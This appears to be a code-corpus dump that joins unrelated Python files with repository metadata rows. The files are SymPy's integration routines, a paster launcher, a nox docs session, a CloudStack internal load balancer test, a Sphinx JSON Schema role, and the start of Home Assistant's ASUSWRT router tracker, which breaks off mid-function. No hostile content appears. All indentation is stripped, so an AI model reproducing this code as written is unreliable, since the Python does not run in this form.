# if it is a poly(x) then let the polynomial integrate itself (fast)
#
# It is important to make this check first, otherwise the other code
# will return a sympy expression instead of a Polynomial.
#
# see Polynomial for details.
if isinstance(f, Poly) and not (manual or meijerg or risch):
return f.integrate(x)
# Piecewise antiderivatives need to call special integrate.
if isinstance(f, Piecewise):
return f.piecewise_integrate(x, **eval_kwargs)
# let's cut it short if `f` does not depend on `x`; if
# x is only a dummy, that will be handled below
if not f.has(x):
return f*x
# try to convert to poly(x) and then integrate if successful (fast)
poly = f.as_poly(x)
if poly is not None and not (manual or meijerg or risch):
return poly.integrate().as_expr()
if risch is not False:
try:
result, i = risch_integrate(f, x, separate_integral=True,
conds=conds)
except NotImplementedError:
pass
else:
if i:
# There was a nonelementary integral. Try integrating it.
# if no part of the NonElementaryIntegral is integrated by
# the Risch algorithm, then use the original function to
# integrate, instead of re-written one
if result == 0:
from sympy.integrals.risch import NonElementaryIntegral
return NonElementaryIntegral(f, x).doit(risch=False)
else:
return result + i.doit(risch=False)
else:
return result
# since Integral(f=g1+g2+...) == Integral(g1) + Integral(g2) + ...
# we are going to handle Add terms separately,
# if `f` is not Add -- we only have one term
# Note that in general, this is a bad idea, because Integral(g1) +
# Integral(g2) might not be computable, even if Integral(g1 + g2) is.
# For example, Integral(x**x + x**x*log(x)). But many heuristics only
# work term-wise. So we compute this step last, after trying
# risch_integrate. We also try risch_integrate again in this loop,
# because maybe the integral is a sum of an elementary part and a
# nonelementary part (like erf(x) + exp(x)). risch_integrate() is
# quite fast, so this is acceptable.
parts = []
args = Add.make_args(f)
for g in args:
coeff, g = g.as_independent(x)
# g(x) = const
if g is S.One and not meijerg:
parts.append(coeff*x)
continue
# g(x) = expr + O(x**n)
order_term = g.getO()
if order_term is not None:
h = self._eval_integral(g.removeO(), x, **eval_kwargs)
if h is not None:
h_order_expr = self._eval_integral(order_term.expr, x, **eval_kwargs)
if h_order_expr is not None:
h_order_term = order_term.func(
h_order_expr, *order_term.variables)
parts.append(coeff*(h + h_order_term))
continue
# NOTE: if there is O(x**n) and we fail to integrate then
# there is no point in trying other methods because they
# will fail, too.
return None
# c
# g(x) = (a*x+b)
if g.is_Pow and not g.exp.has(x) and not meijerg:
a = Wild('a', exclude=[x])
b = Wild('b', exclude=[x])
M = g.base.match(a*x + b)
if M is not None:
if g.exp == -1:
h = log(g.base)
elif conds != 'piecewise':
h = g.base**(g.exp + 1) / (g.exp + 1)
else:
h1 = log(g.base)
h2 = g.base**(g.exp + 1) / (g.exp + 1)
h = Piecewise((h2, Ne(g.exp, -1)), (h1, True))
parts.append(coeff * h / M[a])
continue
# poly(x)
# g(x) = -------
# poly(x)
if g.is_rational_function(x) and not (manual or meijerg or risch):
parts.append(coeff * ratint(g, x))
continue
if not (manual or meijerg or risch):
# g(x) = Mul(trig)
h = trigintegrate(g, x, conds=conds)
if h is not None:
parts.append(coeff * h)
continue
# g(x) has at least a DiracDelta term
h = deltaintegrate(g, x)
if h is not None:
parts.append(coeff * h)
continue
# g(x) has at least a Singularity Function term
h = singularityintegrate(g, x)
if h is not None:
parts.append(coeff * h)
continue
# Try risch again.
if risch is not False:
try:
h, i = risch_integrate(g, x,
separate_integral=True, conds=conds)
except NotImplementedError:
h = None
else:
if i:
h = h + i.doit(risch=False)
parts.append(coeff*h)
continue
# fall back to heurisch
try:
if conds == 'piecewise':
h = heurisch_wrapper(g, x, hints=[])
else:
h = heurisch(g, x, hints=[])
except PolynomialError:
# XXX: this exception means there is a bug in the
# implementation of heuristic Risch integration
# algorithm.
h = None
else:
h = None
if meijerg is not False and h is None:
# rewrite using G functions
try:
h = meijerint_indefinite(g, x)
except NotImplementedError:
from sympy.integrals.meijerint import _debug
_debug('NotImplementedError from meijerint_definite')
res = None
if h is not None:
parts.append(coeff * h)
continue
if h is None and manual is not False:
try:
result = manualintegrate(g, x)
if result is not None and not isinstance(result, Integral):
if result.has(Integral) and not manual:
# Try to have other algorithms do the integrals
# manualintegrate can't handle,
# unless we were asked to use manual only.
# Keep the rest of eval_kwargs in case another
# method was set to False already
new_eval_kwargs = eval_kwargs
new_eval_kwargs["manual"] = False
result = result.func(*[
arg.doit(**new_eval_kwargs) if
arg.has(Integral) else arg
for arg in result.args
]).expand(multinomial=False,
log=False,
power_exp=False,
power_base=False)
if not result.has(Integral):
parts.append(coeff * result)
continue
except (ValueError, PolynomialError):
# can't handle some SymPy expressions
pass
# if we failed maybe it was because we had
# a product that could have been expanded,
# so let's try an expansion of the whole
# thing before giving up; we don't try this
# at the outset because there are things
# that cannot be solved unless they are
# NOT expanded e.g., x**x*(1+log(x)). There
# should probably be a checker somewhere in this
# routine to look for such cases and try to do
# collection on the expressions if they are already
# in an expanded form
if not h and len(args) == 1:
f = sincos_to_sum(f).expand(mul=True, deep=False)
if f.is_Add:
# Note: risch will be identical on the expanded
# expression, but maybe it will be able to pick out parts,
# like x*(exp(x) + erf(x)).
return self._eval_integral(f, x, **eval_kwargs)
if h is not None:
parts.append(coeff * h)
else:
return None
return Add(*parts)
def _eval_lseries(self, x, logx):
expr = self.as_dummy()
symb = x
for l in expr.limits:
if x in l[1:]:
symb = l[0]
break
for term in expr.function.lseries(symb, logx):
yield integrate(term, *expr.limits)
def _eval_nseries(self, x, n, logx):
expr = self.as_dummy()
symb = x
for l in expr.limits:
if x in l[1:]:
symb = l[0]
break
terms, order = expr.function.nseries(
x=symb, n=n, logx=logx).as_coeff_add(Order)
order = [o.subs(symb, x) for o in order]
return integrate(terms, *expr.limits) + Add(*order)*x
def _eval_as_leading_term(self, x):
series_gen = self.args[0].lseries(x)
for leading_term in series_gen:
if leading_term != 0:
break
return integrate(leading_term, *self.args[1:])
def as_sum(self, n=None, method="midpoint", evaluate=True):
"""
Approximates a definite integral by a sum.
Arguments
---------
n
The number of subintervals to use, optional.
method
One of: 'left', 'right', 'midpoint', 'trapezoid'.
evaluate
If False, returns an unevaluated Sum expression. The default
is True, evaluate the sum.
These methods of approximate integration are described in [1].
[1] https://en.wikipedia.org/wiki/Riemann_sum#Methods
Examples
========
>>> from sympy import sin, sqrt
>>> from sympy.abc import x, n
>>> from sympy.integrals import Integral
>>> e = Integral(sin(x), (x, 3, 7))
>>> e
Integral(sin(x), (x, 3, 7))
For demonstration purposes, this interval will only be split into 2
regions, bounded by [3, 5] and [5, 7].
The left-hand rule uses function evaluations at the left of each
interval:
>>> e.as_sum(2, 'left')
2*sin(5) + 2*sin(3)
The midpoint rule uses evaluations at the center of each interval:
>>> e.as_sum(2, 'midpoint')
2*sin(4) + 2*sin(6)
The right-hand rule uses function evaluations at the right of each
interval:
>>> e.as_sum(2, 'right')
2*sin(5) + 2*sin(7)
The trapezoid rule uses function evaluations on both sides of the
intervals. This is equivalent to taking the average of the left and
right hand rule results:
>>> e.as_sum(2, 'trapezoid')
2*sin(5) + sin(3) + sin(7)
>>> (e.as_sum(2, 'left') + e.as_sum(2, 'right'))/2 == _
True
Here, the discontinuity at x = 0 can be avoided by using the
midpoint or right-hand method:
>>> e = Integral(1/sqrt(x), (x, 0, 1))
>>> e.as_sum(5).n(4)
1.730
>>> e.as_sum(10).n(4)
1.809
>>> e.doit().n(4) # the actual value is 2
2.000
The left- or trapezoid method will encounter the discontinuity and
return infinity:
>>> e.as_sum(5, 'left')
zoo
The number of intervals can be symbolic. If omitted, a dummy symbol
will be used for it.
>>> e = Integral(x**2, (x, 0, 2))
>>> e.as_sum(n, 'right').expand()
8/3 + 4/n + 4/(3*n**2)
This shows that the midpoint rule is more accurate, as its error
term decays as the square of n:
>>> e.as_sum(method='midpoint').expand()
8/3 - 2/(3*_n**2)
A symbolic sum is returned with evaluate=False:
>>> e.as_sum(n, 'midpoint', evaluate=False)
2*Sum((2*_k/n - 1/n)**2, (_k, 1, n))/n
See Also
========
Integral.doit : Perform the integration using any hints
"""
from sympy.concrete.summations import Sum
limits = self.limits
if len(limits) > 1:
raise NotImplementedError(
"Multidimensional midpoint rule not implemented yet")
else:
limit = limits[0]
if (len(limit) != 3 or limit[1].is_finite is False or
limit[2].is_finite is False):
raise ValueError("Expecting a definite integral over "
"a finite interval.")
if n is None:
n = Dummy('n', integer=True, positive=True)
else:
n = sympify(n)
if (n.is_positive is False or n.is_integer is False or
n.is_finite is False):
raise ValueError("n must be a positive integer, got %s" % n)
x, a, b = limit
dx = (b - a)/n
k = Dummy('k', integer=True, positive=True)
f = self.function
if method == "left":
result = dx*Sum(f.subs(x, a + (k-1)*dx), (k, 1, n))
elif method == "right":
result = dx*Sum(f.subs(x, a + k*dx), (k, 1, n))
elif method == "midpoint":
result = dx*Sum(f.subs(x, a + k*dx - dx/2), (k, 1, n))
elif method == "trapezoid":
result = dx*((f.subs(x, a) + f.subs(x, b))/2 +
Sum(f.subs(x, a + k*dx), (k, 1, n - 1)))
else:
raise ValueError("Unknown method %s" % method)
return result.doit() if evaluate else result
def _sage_(self):
import sage.all as sage
f, limits = self.function._sage_(), list(self.limits)
for limit in limits:
if len(limit) == 1:
x = limit[0]
f = sage.integral(f,
x._sage_(),
hold=True)
elif len(limit) == 2:
x, b = limit
f = sage.integral(f,
x._sage_(),
b._sage_(),
hold=True)
else:
x, a, b = limit
f = sage.integral(f,
(x._sage_(),
a._sage_(),
b._sage_()),
hold=True)
return f
def integrate(*args, **kwargs):
"""integrate(f, var, ...)
Compute definite or indefinite integral of one or more variables
using Risch-Norman algorithm and table lookup. This procedure is
able to handle elementary algebraic and transcendental functions
and also a huge class of special functions, including Airy,
Bessel, Whittaker and Lambert.
var can be:
- a symbol -- indefinite integration
- a tuple (symbol, a) -- indefinite integration with result
given with `a` replacing `symbol`
- a tuple (symbol, a, b) -- definite integration
Several variables can be specified, in which case the result is
multiple integration. (If var is omitted and the integrand is
univariate, the indefinite integral in that variable will be performed.)
Indefinite integrals are returned without terms that are independent
of the integration variables. (see examples)
Definite improper integrals often entail delicate convergence
conditions. Pass conds='piecewise', 'separate' or 'none' to have
these returned, respectively, as a Piecewise function, as a separate
result (i.e. result will be a tuple), or not at all (default is
'piecewise').
**Strategy**
SymPy uses various approaches to definite integration. One method is to
find an antiderivative for the integrand, and then use the fundamental
theorem of calculus. Various functions are implemented to integrate
polynomial, rational and trigonometric functions, and integrands
containing DiracDelta terms.
SymPy also implements the part of the Risch algorithm, which is a decision
procedure for integrating elementary functions, i.e., the algorithm can
either find an elementary antiderivative, or prove that one does not
exist. There is also a (very successful, albeit somewhat slow) general
implementation of the heuristic Risch algorithm. This algorithm will
eventually be phased out as more of the full Risch algorithm is
implemented. See the docstring of Integral._eval_integral() for more
details on computing the antiderivative using algebraic methods.
The option risch=True can be used to use only the (full) Risch algorithm.
This is useful if you want to know if an elementary function has an
elementary antiderivative. If the indefinite Integral returned by this
function is an instance of NonElementaryIntegral, that means that the
Risch algorithm has proven that integral to be non-elementary. Note that
by default, additional methods (such as the Meijer G method outlined
below) are tried on these integrals, as they may be expressible in terms
of special functions, so if you only care about elementary answers, use
risch=True. Also note that an unevaluated Integral returned by this
function is not necessarily a NonElementaryIntegral, even with risch=True,
as it may just be an indication that the particular part of the Risch
algorithm needed to integrate that function is not yet implemented.
Another family of strategies comes from re-writing the integrand in
terms of so-called Meijer G-functions. Indefinite integrals of a
single G-function can always be computed, and the definite integral
of a product of two G-functions can be computed from zero to
infinity. Various strategies are implemented to rewrite integrands
as G-functions, and use this information to compute integrals (see
the ``meijerint`` module).
The option manual=True can be used to use only an algorithm that tries
to mimic integration by hand. This algorithm does not handle as many
integrands as the other algorithms implemented but may return results in
a more familiar form. The ``manualintegrate`` module has functions that
return the steps used (see the module docstring for more information).
In general, the algebraic methods work best for computing
antiderivatives of (possibly complicated) combinations of elementary
functions. The G-function methods work best for computing definite
integrals from zero to infinity of moderately complicated
combinations of special functions, or indefinite integrals of very
simple combinations of special functions.
The strategy employed by the integration code is as follows:
- If computing a definite integral, and both limits are real,
and at least one limit is +- oo, try the G-function method of
definite integration first.
- Try to find an antiderivative, using all available methods, ordered
by performance (that is try fastest method first, slowest last; in
particular polynomial integration is tried first, Meijer
G-functions second to last, and heuristic Risch last).
- If still not successful, try G-functions irrespective of the
limits.
The option meijerg=True, False, None can be used to, respectively:
always use G-function methods and no others, never use G-function
methods, or use all available methods (in order as described above).
It defaults to None.
Examples
========
>>> from sympy import integrate, log, exp, oo
>>> from sympy.abc import a, x, y
>>> integrate(x*y, x)
x**2*y/2
>>> integrate(log(x), x)
x*log(x) - x
>>> integrate(log(x), (x, 1, a))
a*log(a) - a + 1
>>> integrate(x)
x**2/2
Terms that are independent of x are dropped by indefinite integration:
>>> from sympy import sqrt
>>> integrate(sqrt(1 + x), (x, 0, x))
2*(x + 1)**(3/2)/3 - 2/3
>>> integrate(sqrt(1 + x), x)
2*(x + 1)**(3/2)/3
>>> integrate(x*y)
Traceback (most recent call last):
...
ValueError: specify integration variables to integrate x*y
Note that ``integrate(x)`` syntax is meant only for convenience
in interactive sessions and should be avoided in library code.
>>> integrate(x**a*exp(-x), (x, 0, oo)) # same as conds='piecewise'
Piecewise((gamma(a + 1), -re(a) < 1),
(Integral(x**a*exp(-x), (x, 0, oo)), True))
>>> integrate(x**a*exp(-x), (x, 0, oo), conds='none')
gamma(a + 1)
>>> integrate(x**a*exp(-x), (x, 0, oo), conds='separate')
(gamma(a + 1), -re(a) < 1)
See Also
========
Integral, Integral.doit
"""
meijerg = kwargs.pop('meijerg', None)
conds = kwargs.pop('conds', 'piecewise')
risch = kwargs.pop('risch', None)
manual = kwargs.pop('manual', None)
integral = Integral(*args, **kwargs)
if isinstance(integral, Integral):
return integral.doit(deep=False, meijerg=meijerg, conds=conds,
risch=risch, manual=manual)
else:
return integral
def line_integrate(field, curve, vars):
"""line_integrate(field, Curve, variables)
Compute the line integral.
Examples
========
>>> from sympy import Curve, line_integrate, E, ln
>>> from sympy.abc import x, y, t
>>> C = Curve([E**t + 1, E**t - 1], (t, 0, ln(2)))
>>> line_integrate(x + y, C, [x, y])
3*sqrt(2)
See Also
========
integrate, Integral
"""
from sympy.geometry import Curve
F = sympify(field)
if not F:
raise ValueError(
"Expecting function specifying field as first argument.")
if not isinstance(curve, Curve):
raise ValueError("Expecting Curve entity as second argument.")
if not is_sequence(vars):
raise ValueError("Expecting ordered iterable for variables.")
if len(curve.functions) != len(vars):
raise ValueError("Field variable size does not match curve dimension.")
if curve.parameter in vars:
raise ValueError("Curve parameter clashes with field parameters.")
# Calculate derivatives for line parameter functions
# F(r) -> F(r(t)) and finally F(r(t)*r'(t))
Ft = F
dldt = 0
for i, var in enumerate(vars):
_f = curve.functions[i]
_dn = diff(_f, curve.parameter)
# ...arc length
dldt = dldt + (_dn * _dn)
Ft = Ft.subs(var, _f)
Ft = Ft * sqrt(dldt)
integral = Integral(Ft, curve.limits).doit(deep=False)
return integral
| 39.669643 | 89 | 0.537665 |
fd45c4025c5672cdf6268f63fedfad62afa0c7bb | 369 | py | Python | paster-script.py | greck2908/gamification-engine | 4a74086bde4505217e4b9ba36349a427a7042b4b | [
"MIT"
] | 347 | 2015-03-03T14:25:59.000Z | 2022-03-09T07:46:31.000Z | paster-script.py | greck2908/gamification-engine | 4a74086bde4505217e4b9ba36349a427a7042b4b | [
"MIT"
] | 76 | 2015-03-05T23:37:31.000Z | 2022-03-31T13:41:42.000Z | paster-script.py | greck2908/gamification-engine | 4a74086bde4505217e4b9ba36349a427a7042b4b | [
"MIT"
] | 115 | 2015-03-04T23:47:25.000Z | 2021-12-24T06:24:06.000Z | #!/usr/bin/env python
import os
import sys
try:
here = __file__
except NameError:
# Python 2.2
here = sys.argv[0]
relative_paste = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(here))), 'paste')
if os.path.exists(relative_paste):
sys.path.insert(0, os.path.dirname(relative_paste))
from paste.script import command
command.run()
| 19.421053 | 69 | 0.707317 |
e0029cf6a075af75affb004cde179f82569fc8f2 | 387 | py | Python | noxfile.py | kprussing/kprussing.github.io | 50a666ba09f400f95507ae86f6ed27828f5da676 | [
"BSD-2-Clause"
] | null | null | null | noxfile.py | kprussing/kprussing.github.io | 50a666ba09f400f95507ae86f6ed27828f5da676 | [
"BSD-2-Clause"
] | null | null | null | noxfile.py | kprussing/kprussing.github.io | 50a666ba09f400f95507ae86f6ed27828f5da676 | [
"BSD-2-Clause"
] | null | null | null | import pathlib
import nox
@nox.session
def docs(session):
"""Build the HTML pages"""
session.install("sphinx", "kpruss")
root = pathlib.Path(__file__).parent
session.run("sphinx-build",
"-W",
"-b", "html",
"-d", str(root / ".doctrees"),
str(root / "sources"),
str(root)
)
| 21.5 | 46 | 0.470284 |
174782f5a7669ba1b71b9a8c8e0c25af38d584e7 | 5,752 | py | Python | test/integration/smoke/test_internal_lb.py | vispractice/cloudstack | d543e2aa2c05422559d866c8b2ae29c83bfd5da0 | [
"Apache-2.0"
] | null | null | null | test/integration/smoke/test_internal_lb.py | vispractice/cloudstack | d543e2aa2c05422559d866c8b2ae29c83bfd5da0 | [
"Apache-2.0"
] | null | null | null | test/integration/smoke/test_internal_lb.py | vispractice/cloudstack | d543e2aa2c05422559d866c8b2ae29c83bfd5da0 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Tests for configuring Internal Load Balancing Rules.
"""
#Import Local Modules
from marvin.codes import FAILED
from marvin.cloudstackTestCase import *
from marvin.cloudstackAPI import *
from marvin.lib.utils import *
from marvin.lib.base import *
from marvin.lib.common import *
from nose.plugins.attrib import attr
class TestInternalLb(cloudstackTestCase):
"""Test Internal LB
"""
@classmethod
def setUpClass(cls):
testClient = super(TestInternalLb, cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.services = testClient.getParsedTestDataConfig()
cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
cls.domain = get_domain(cls.apiclient)
cls.service_offering = ServiceOffering.create(
cls.apiclient,
cls.services["service_offerings"]["tiny"]
)
cls.account = Account.create(cls.apiclient, services=cls.services["account"])
cls.template = get_template(
cls.apiclient,
cls.zone.id,
cls.services["ostype"]
)
if cls.template == FAILED:
assert False, "get_template() failed to return template with description %s" % cls.services["ostype"]
cls.debug("Successfully created account: %s, id: \
%s" % (cls.account.name,\
cls.account.id))
cls.cleanup = [cls.account]
@attr(tags=["smoke", "advanced"], required_hardware="true")
def test_internallb(self):
"""Test create, delete, assign, remove of internal loadbalancer
"""
#1) Create and enable network offering with Internal Lb vm service
self.networkOffering = NetworkOffering.create(self.apiclient, self.services["network_offering_internal_lb"], conservemode=False)
#TODO: SIMENH:modify this test to verify lb rules by sending request from another tier
self.networkOffering.update(self.apiclient, state="Enabled")
#2) Create VPC and network in it
vpcOffering = VpcOffering.list(self.apiclient,isdefault=True)
self.assert_(vpcOffering is not None and len(vpcOffering)>0, "No VPC offerings found")
self.services["vpc"] = {}
self.services["vpc"]["name"] = "vpc-internallb"
self.services["vpc"]["displaytext"] = "vpc-internallb"
self.services["vpc"]["cidr"] = "10.1.1.0/24"
vpc = VPC.create(
apiclient=self.apiclient,
services=self.services["vpc"],
networkDomain="vpc.internallb",
vpcofferingid=vpcOffering[0].id,
zoneid=self.zone.id,
account=self.account.name,
domainid=self.domain.id
)
self.assert_(vpc is not None, "VPC creation failed")
self.services["vpcnetwork"] = {}
self.services["vpcnetwork"]["name"] = "vpcntwk"
self.services["vpcnetwork"]["displaytext"] = "vpcntwk"
ntwk = Network.create(
apiclient=self.apiclient,
services=self.services["vpcnetwork"],
accountid=self.account.name,
domainid=self.domain.id,
networkofferingid=self.networkOffering.id,
zoneid=self.zone.id,
vpcid=vpc.id,
gateway="10.1.1.1",
netmask="255.255.255.192"
)
self.assertIsNotNone(ntwk, "Network failed to create")
self.debug("Network %s created in VPC %s" %(ntwk.id, vpc.id))
#3) Deploy a vm
self.services["virtual_machine"]["networkids"] = ntwk.id
vm = VirtualMachine.create(self.apiclient, services=self.services["virtual_machine"],
templateid=self.template.id,
zoneid=self.zone.id,
accountid=self.account.name,
domainid= self.domain.id,
serviceofferingid=self.service_offering.id,
)
self.assert_(vm is not None, "VM failed to deploy")
self.assert_(vm.state == 'Running', "VM is not running")
self.debug("VM %s deployed in VPC %s" %(vm.id, vpc.id))
#4) Create an Internal Load Balancer
applb = ApplicationLoadBalancer.create(self.apiclient, services=self.services,
name="lbrule",
sourceport=22,
instanceport=22,
algorithm="roundrobin",
scheme="internal",
sourcenetworkid=ntwk.id,
networkid=ntwk.id)
#5) Assign the VM to the Internal Load Balancer
applb.assign(self.apiclient, vms=[vm])
#6) Remove the vm from the Interanl Load Balancer
applb.remove(self.apiclient, vms=[vm])
#7) Delete the Load Balancer
applb.delete(self.apiclient)
@classmethod
def tearDownClass(cls):
try:
cleanup_resources(cls.apiclient, cls.cleanup)
except Exception, e:
raise Exception("Cleanup failed with %s" % e)
| 40.794326 | 136 | 0.63404 |
637a71c71c13e92553b21880c5824147cca02a37 | 3,718 | py | Python | docs/jsonschema_role.py | gastonci/jsonschema | c0fd4e007227b283e3e8d363e3a991b2d34ccd9a | [
"MIT"
] | null | null | null | docs/jsonschema_role.py | gastonci/jsonschema | c0fd4e007227b283e3e8d363e3a991b2d34ccd9a | [
"MIT"
] | null | null | null | docs/jsonschema_role.py | gastonci/jsonschema | c0fd4e007227b283e3e8d363e3a991b2d34ccd9a | [
"MIT"
] | null | null | null | from datetime import datetime
from docutils import nodes
import errno
import os
try:
import urllib2 as urllib
except ImportError:
import urllib.request as urllib
import certifi
from lxml import html
VALIDATION_SPEC = "https://json-schema.org/draft-04/json-schema-validation.html"
def setup(app):
"""
Install the plugin.
Arguments:
app (sphinx.application.Sphinx):
the Sphinx application context
"""
app.add_config_value("cache_path", "_cache", "")
try:
os.makedirs(app.config.cache_path)
except OSError as error:
if error.errno != errno.EEXIST:
raise
path = os.path.join(app.config.cache_path, "spec.html")
spec = fetch_or_load(path)
app.add_role("validator", docutils_sucks(spec))
def fetch_or_load(spec_path):
"""
Fetch a new specification or use the cache if it's current.
Arguments:
cache_path:
the path to a cached specification
"""
headers = {}
try:
modified = datetime.utcfromtimestamp(os.path.getmtime(spec_path))
date = modified.strftime("%a, %d %b %Y %I:%M:%S UTC")
headers["If-Modified-Since"] = date
except OSError as error:
if error.errno != errno.ENOENT:
raise
request = urllib.Request(VALIDATION_SPEC, headers=headers)
response = urllib.urlopen(request, cafile=certifi.where())
if response.code == 200:
with open(spec_path, "w+b") as spec:
spec.writelines(response)
spec.seek(0)
return html.parse(spec)
with open(spec_path) as spec:
return html.parse(spec)
def docutils_sucks(spec):
"""
Yeah.
It doesn't allow using a class because it does stupid stuff like try to set
attributes on the callable object rather than just keeping a dict.
"""
base_url = VALIDATION_SPEC
ref_url = "https://json-schema.org/draft-04/json-schema-core.html#rfc.section.4.1"
schema_url = "https://json-schema.org/draft-04/json-schema-core.html#rfc.section.6"
def validator(name, raw_text, text, lineno, inliner):
"""
Link to the JSON Schema documentation for a validator.
Arguments:
name (str):
the name of the role in the document
raw_source (str):
the raw text (role with argument)
text (str):
the argument given to the role
lineno (int):
the line number
inliner (docutils.parsers.rst.states.Inliner):
the inliner
Returns:
tuple:
a 2-tuple of nodes to insert into the document and an
iterable of system messages, both possibly empty
"""
if text == "$ref":
return [nodes.reference(raw_text, text, refuri=ref_url)], []
elif text == "$schema":
return [nodes.reference(raw_text, text, refuri=schema_url)], []
# find the header in the validation spec containing matching text
header = spec.xpath("//h1[contains(text(), '{0}')]".format(text))
if len(header) == 0:
inliner.reporter.warning(
"Didn't find a target for {0}".format(text),
)
uri = base_url
else:
if len(header) > 1:
inliner.reporter.info(
"Found multiple targets for {0}".format(text),
)
# get the href from link in the header
uri = base_url + header[0].find("a").attrib["href"]
reference = nodes.reference(raw_text, text, refuri=uri)
return [reference], []
return validator
| 25.121622 | 87 | 0.591447 |
50411591cb77b1786aabf38d6d0d48171dfd60bc | 11,154 | py | Python | homeassistant/components/device_tracker/asuswrt.py | mweinelt/home-assistant | cc0d0a38d7f24885e5146bd0826fa8ba3e2b39a1 | [
"MIT"
] | 4 | 2017-03-22T21:16:45.000Z | 2021-06-11T05:08:14.000Z | homeassistant/components/device_tracker/asuswrt.py | mweinelt/home-assistant | cc0d0a38d7f24885e5146bd0826fa8ba3e2b39a1 | [
"MIT"
] | null | null | null | homeassistant/components/device_tracker/asuswrt.py | mweinelt/home-assistant | cc0d0a38d7f24885e5146bd0826fa8ba3e2b39a1 | [
"MIT"
] | 4 | 2016-11-27T01:59:49.000Z | 2018-03-11T07:17:25.000Z | """
Support for ASUSWRT routers.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/device_tracker.asuswrt/
"""
import logging
import re
import socket
import telnetlib
import threading
from collections import namedtuple
from datetime import timedelta
import voluptuous as vol
from homeassistant.components.device_tracker import DOMAIN, PLATFORM_SCHEMA
from homeassistant.const import CONF_HOST, CONF_PASSWORD, CONF_USERNAME
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
# Return cached results if last scan was less then this time ago.
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=5)
CONF_PROTOCOL = 'protocol'
CONF_MODE = 'mode'
CONF_SSH_KEY = 'ssh_key'
CONF_PUB_KEY = 'pub_key'
SECRET_GROUP = 'Password or SSH Key'
PLATFORM_SCHEMA = vol.All(
cv.has_at_least_one_key(CONF_PASSWORD, CONF_PUB_KEY, CONF_SSH_KEY),
PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_USERNAME): cv.string,
vol.Optional(CONF_PROTOCOL, default='ssh'):
vol.In(['ssh', 'telnet']),
vol.Optional(CONF_MODE, default='router'):
vol.In(['router', 'ap']),
vol.Exclusive(CONF_PASSWORD, SECRET_GROUP): cv.string,
vol.Exclusive(CONF_SSH_KEY, SECRET_GROUP): cv.isfile,
vol.Exclusive(CONF_PUB_KEY, SECRET_GROUP): cv.isfile
}))
_LOGGER = logging.getLogger(__name__)
REQUIREMENTS = ['pexpect==4.0.1']
_LEASES_CMD = 'cat /var/lib/misc/dnsmasq.leases'
_LEASES_REGEX = re.compile(
r'\w+\s' +
r'(?P<mac>(([0-9a-f]{2}[:-]){5}([0-9a-f]{2})))\s' +
r'(?P<ip>([0-9]{1,3}[\.]){3}[0-9]{1,3})\s' +
r'(?P<host>([^\s]+))')
# command to get both 5GHz and 2.4GHz clients
_WL_CMD = '{ wl -i eth2 assoclist & wl -i eth1 assoclist ; }'
_WL_REGEX = re.compile(
r'\w+\s' +
r'(?P<mac>(([0-9A-F]{2}[:-]){5}([0-9A-F]{2})))')
_ARP_CMD = 'arp -n'
_ARP_REGEX = re.compile(
r'.+\s' +
r'\((?P<ip>([0-9]{1,3}[\.]){3}[0-9]{1,3})\)\s' +
r'.+\s' +
r'(?P<mac>(([0-9a-f]{2}[:-]){5}([0-9a-f]{2})))' +
r'\s' +
r'.*')
_IP_NEIGH_CMD = 'ip neigh'
_IP_NEIGH_REGEX = re.compile(
r'(?P<ip>([0-9]{1,3}[\.]){3}[0-9]{1,3})\s' +
r'\w+\s' +
r'\w+\s' +
r'(\w+\s(?P<mac>(([0-9a-f]{2}[:-]){5}([0-9a-f]{2}))))?\s' +
r'(?P<status>(\w+))')
# pylint: disable=unused-argument
def get_scanner(hass, config):
"""Validate the configuration and return an ASUS-WRT scanner."""
scanner = AsusWrtDeviceScanner(config[DOMAIN])
return scanner if scanner.success_init else None
AsusWrtResult = namedtuple('AsusWrtResult', 'neighbors leases arp')
class AsusWrtDeviceScanner(object):
"""This class queries a router running ASUSWRT firmware."""
# Eighth attribute needed for mode (AP mode vs router mode)
def __init__(self, config):
"""Initialize the scanner."""
self.host = config[CONF_HOST]
self.username = config[CONF_USERNAME]
self.password = config.get(CONF_PASSWORD, '')
self.ssh_key = config.get('ssh_key', config.get('pub_key', ''))
self.protocol = config[CONF_PROTOCOL]
self.mode = config[CONF_MODE]
if self.protocol == 'ssh':
if self.ssh_key:
self.ssh_secret = {'ssh_key': self.ssh_key}
elif self.password:
self.ssh_secret = {'password': self.password}
else:
_LOGGER.error('No password or private key specified')
self.success_init = False
return
else:
if not self.password:
_LOGGER.error('No password specified')
self.success_init = False
return
self.lock = threading.Lock()
self.last_results = {}
# Test the router is accessible.
data = self.get_asuswrt_data()
self.success_init = data is not None
def scan_devices(self):
"""Scan for new devices and return a list with found device IDs."""
self._update_info()
return [client['mac'] for client in self.last_results]
def get_device_name(self, device):
"""Return the name of the given device or None if we don't know."""
if not self.last_results:
return None
for client in self.last_results:
if client['mac'] == device:
return client['host']
return None
@Throttle(MIN_TIME_BETWEEN_SCANS)
def _update_info(self):
"""Ensure the information from the ASUSWRT router is up to date.
Return boolean if scanning successful.
"""
if not self.success_init:
return False
with self.lock:
_LOGGER.info('Checking ARP')
data = self.get_asuswrt_data()
if not data:
return False
active_clients = [client for client in data.values() if
client['status'] == 'REACHABLE' or
client['status'] == 'DELAY' or
client['status'] == 'STALE']
self.last_results = active_clients
return True
def ssh_connection(self):
"""Retrieve data from ASUSWRT via the ssh protocol."""
from pexpect import pxssh, exceptions
ssh = pxssh.pxssh()
try:
ssh.login(self.host, self.username, **self.ssh_secret)
except exceptions.EOF as err:
_LOGGER.error('Connection refused. Is SSH enabled?')
return None
except pxssh.ExceptionPxssh as err:
